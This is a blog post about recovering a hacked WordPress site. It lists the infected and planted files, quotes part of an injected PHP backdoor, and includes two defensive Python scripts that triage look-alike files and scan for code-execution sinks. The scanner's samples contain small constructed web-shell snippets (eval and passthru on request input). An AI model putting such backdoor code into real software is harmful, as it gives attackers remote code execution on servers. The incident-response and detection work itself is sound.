Malware and Restoring WordPress Security

Lately I had an occasion to work on restoring a WordPress website from a malicious attack. I must admit I had never before had any issues with security, so this was a completely new experience.

A website belonging to a client’s client was one day blocked by Google – search results showed a warning that the website was malicious instead of the usual site description – and by some web browsers, such as Firefox and Chrome. At first we were a bit irritated, thinking it was caused by a slightly outdated version of WordPress or some plugin. After a bit of investigation using Google’s Webmaster Tools, we found that some of the pages had injected code that immediately redirected visitors to a truly suspicious website.

Google was forgiven within an instant and a swift recovery operation started. First, WordPress and all plugins were updated to the latest versions. That was crucial, because if any of the WP core files had been tampered with, the update quickly and easily restored them to their correct versions. But, of course, there are lots of other files that are not part of the WP core.

It took several hours, but it would seem I managed to find all the infected files and remove them. The attacker(s) were very tricky, planting files with names very similar to those of the core WP files. For example, WP ships with a wp-app.php file, but I found a wp-apps.php, which at a brief glance didn’t look suspicious. This is where updating WP came in handy: it made suspicious files easier to spot, because their modification dates differed from those of the freshly updated core files. On opening such a file all doubts were gone, because the contents definitely didn’t look like anything WordPress-y. The arrogant attackers even had the nerve to include the following comment at the top of the files:

/* This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. */

Quite cheeky that!

So, here is a list of all the files I found that were either infected (marked INF; malicious code was added to an existing file) or planted (marked PLA; a completely new file was added to the server).

  • wp-content
    • plugins
      • all-in-one-favicon/includes/settings-page/sp-footer.php – INF
    • themes
      • twentyeleven
        • footer.php – INF
        • sidebar-footer.php – INF
  • wp-includes
    • js
      • js – PLA
        • cnn.php – PLA
        • rconfig.php – PLA
        • wp-load.php – PLA
    • wp-var.php – PLA
  • wp-apps.php – PLA
  • wp-count.php – PLA
  • wp-register.php – INF

You will notice that a file in the All In One Favicon plugin was infected. However, I do not think, or even suspect, that the plugin’s creators had anything to do with the infection!
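The triage described above (core files are freshly restored by the update, so anything in a core location with a different modification date or a look-alike name stands out) can be scripted. The following Python is an added example, not code from this post or from WordPress. It assumes a manifest of genuine core paths (KNOWN_GOOD is a constructed stand-in for the per-version file list WordPress publishes), a cut-off time at which the update finished, and it builds a small constructed directory tree in a temp folder to run against.

```python
import difflib
import os
import shutil
import tempfile

# Constructed stand-in for the list of genuine core paths. A real run would
# use the file list / checksums published for the installed WordPress version.
KNOWN_GOOD = {
    "index.php",
    "wp-app.php",
    "wp-load.php",
    "wp-config.php",
    "wp-includes/js/jquery/jquery.js",
    "wp-content/themes/twentyeleven/footer.php",
}
# Directories where only core files belong; anything unexpected here is suspect.
CORE_DIRS = ("wp-admin", "wp-includes")


def walk_files(root):
    """Yield (path relative to root with forward slashes, absolute path)."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            abs_path = os.path.join(dirpath, name)
            yield os.path.relpath(abs_path, root).replace(os.sep, "/"), abs_path


def in_core_scope(rel):
    """True for files in the install root or under a core-only directory."""
    parts = rel.split("/")
    return len(parts) == 1 or parts[0] in CORE_DIRS


def triage(root, known_good, update_time):
    """Return planted files (with the core name each imitates, if any) and
    known files modified after the core update finished."""
    core_names = sorted({os.path.basename(p) for p in known_good})
    planted, modified = [], []
    for rel, abs_path in walk_files(root):
        if rel in known_good:
            if os.path.getmtime(abs_path) > update_time:
                modified.append(rel)
        elif in_core_scope(rel):
            # Catch look-alike names such as wp-apps.php next to wp-app.php,
            # and genuine core names dropped into the wrong directory.
            close = difflib.get_close_matches(os.path.basename(rel), core_names, n=1, cutoff=0.8)
            planted.append((rel, close[0] if close else None))
        # Plugin and upload directories are outside the core manifest; they
        # need their own manifest or a source scan and are not judged here.
    return {"planted": sorted(planted), "modified": sorted(modified)}


def build_constructed_tree(root, update_time):
    """Write a tiny constructed install: genuine files, one touched after the
    update, and planted files whose names echo the list in the post."""
    files = {
        "index.php": update_time - 3600,
        "wp-app.php": update_time - 3600,
        "wp-apps.php": update_time - 30 * 86400,                        # planted look-alike
        "wp-includes/js/js/cnn.php": update_time - 30 * 86400,          # planted
        "wp-includes/js/js/wp-load.php": update_time - 30 * 86400,      # planted: core name, wrong place
        "wp-content/themes/twentyeleven/footer.php": update_time + 60,  # genuine file, modified later
        "wp-content/plugins/example/example.php": update_time - 3600,   # outside core scope
    }
    for rel, mtime in files.items():
        abs_path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(abs_path), exist_ok=True)
        with open(abs_path, "w") as fh:
            fh.write("<?php // constructed sample file\n")
        os.utime(abs_path, (mtime, mtime))


def demo():
    """Build the constructed tree in a temp dir, triage it, clean up."""
    update_time = 1_600_000_000  # constructed: the moment the core update finished
    root = tempfile.mkdtemp(prefix="wp-triage-")
    try:
        build_constructed_tree(root, update_time)
        return triage(root, KNOWN_GOOD, update_time)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    result = demo()
    for rel, lookalike in result["planted"]:
        hint = f" (imitates core file {lookalike})" if lookalike else ""
        print(f"PLANTED  {rel}{hint}")
    for rel in result["modified"]:
        print(f"MODIFIED {rel}")
```

On the constructed tree this reports wp-apps.php as imitating wp-app.php, the two files under wp-includes/js/js as planted (one of them reusing the genuine name wp-load.php in a place it does not belong), and the theme footer as modified after the update; the plugin file is deliberately left out of the verdict because the core manifest says nothing about plugins.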

So, what was the infectious code? Mostly it was just two lines of code, but very tricky ones! Take a look at the following PHP code:

if (isset($_POST['wp-load'])) {

It allows any text posted from a form to be run as PHP code. Of course, the attacker wouldn’t be posting plain text; it would be malicious code, which the server would then execute.
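Rather than reading every file by hand, a defender can scan the source tree for exactly this pattern: request input arriving at a function that executes code. The following Python scanner is an added example, not code from this post. It flags lines where a superglobal ($_POST, $_GET, $_REQUEST, $_COOKIE) or a variable assigned straight from one reaches an execution sink, and lines where a decoded blob does; the sink and decoder lists and the three sample files are my constructions, and the output is a list of leads for manual review, not a verdict.

```python
import os
import re

# Functions that turn a string into executed code or a command. Hits are leads
# for manual review, not verdicts: legitimate code may use some of these.
SINKS = re.compile(r"\b(eval|assert|create_function|system|passthru|shell_exec|exec|popen)\s*\(")
REQUEST_INPUT = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b")
# Decoders that typically wrap a hidden payload before it reaches a sink.
OBFUSCATION = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")
# "$name = ... $_POST[...]" marks $name as carrying request input.
ASSIGN_FROM_REQUEST = re.compile(r"\$(\w+)\s*=(?!=)[^;]*\$_(POST|GET|REQUEST|COOKIE)\b")

REASON_DIRECT = "request input reaches code-execution sink"
REASON_INDIRECT = "variable ${} carries request input into code-execution sink"
REASON_OBFUSCATED = "decoded payload reaches code-execution sink"


def scan_source(text):
    """Return [(line number, reason)] for lines that feed request input or a
    decoded blob into a code-execution sink. Taint tracking is one level deep
    on purpose: only variables assigned directly from a superglobal count."""
    lines = text.splitlines()
    tainted = set()
    for line in lines:
        m = ASSIGN_FROM_REQUEST.search(line)
        if m:
            tainted.add(m.group(1))
    tainted_use = (re.compile(r"\$(" + "|".join(map(re.escape, sorted(tainted))) + r")\b")
                   if tainted else None)
    findings = []
    for lineno, line in enumerate(lines, 1):
        if not SINKS.search(line):
            continue
        if REQUEST_INPUT.search(line):
            findings.append((lineno, REASON_DIRECT))
        elif tainted_use and tainted_use.search(line):
            findings.append((lineno, REASON_INDIRECT.format(tainted_use.search(line).group(1))))
        elif OBFUSCATION.search(line):
            findings.append((lineno, REASON_OBFUSCATED))
    return findings


def scan_tree(root):
    """Scan every .php file below root; return {relative path: findings}."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_source(fh.read())
            if findings:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return report


# Constructed samples (not files from the compromised site).
BACKDOOR_SAMPLE = """<?php
// modelled on the injected two-liner the post describes
if (isset($_POST['wp-load'])) {
    eval($_POST['wp-load']);
}
"""
INDIRECT_SAMPLE = """<?php
$c = $_REQUEST['cmd'];
echo "<h1>Hello</h1>";
passthru($c);
"""
CLEAN_SAMPLE = """<?php
$title = isset($_POST['title']) ? sanitize_text_field($_POST['title']) : '';
echo esc_html($title);
"""

if __name__ == "__main__":
    for label, sample in (("backdoor", BACKDOOR_SAMPLE), ("indirect", INDIRECT_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, scan_source(sample))
```

The clean sample shows why the sink check matters: it reads $_POST too, but only passes it to a sanitiser and an escaper, so it produces no finding. Run scan_tree against the document root after an update and the short list it returns is where to start reading.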

Further investigation revealed the site had been a victim of the notorious r57shell backdoor. Just google it and you’ll see ;)

So, what other steps did we take? Besides updating WordPress and the plugins and removing all the malicious code, we also changed ALL passwords: users, admins, FTP, database. We also followed this WP FAQ, this tutorial on Hardening WordPress and another one. After implementing all the advice in those tutorials, we signed up with Sucuri.

Also worth mentioning is that the site was unblocked by Google et al. less than 24 hours after we had requested a review. That was very quick! Now we can hopefully go back to the much more enjoyable business of coding! :)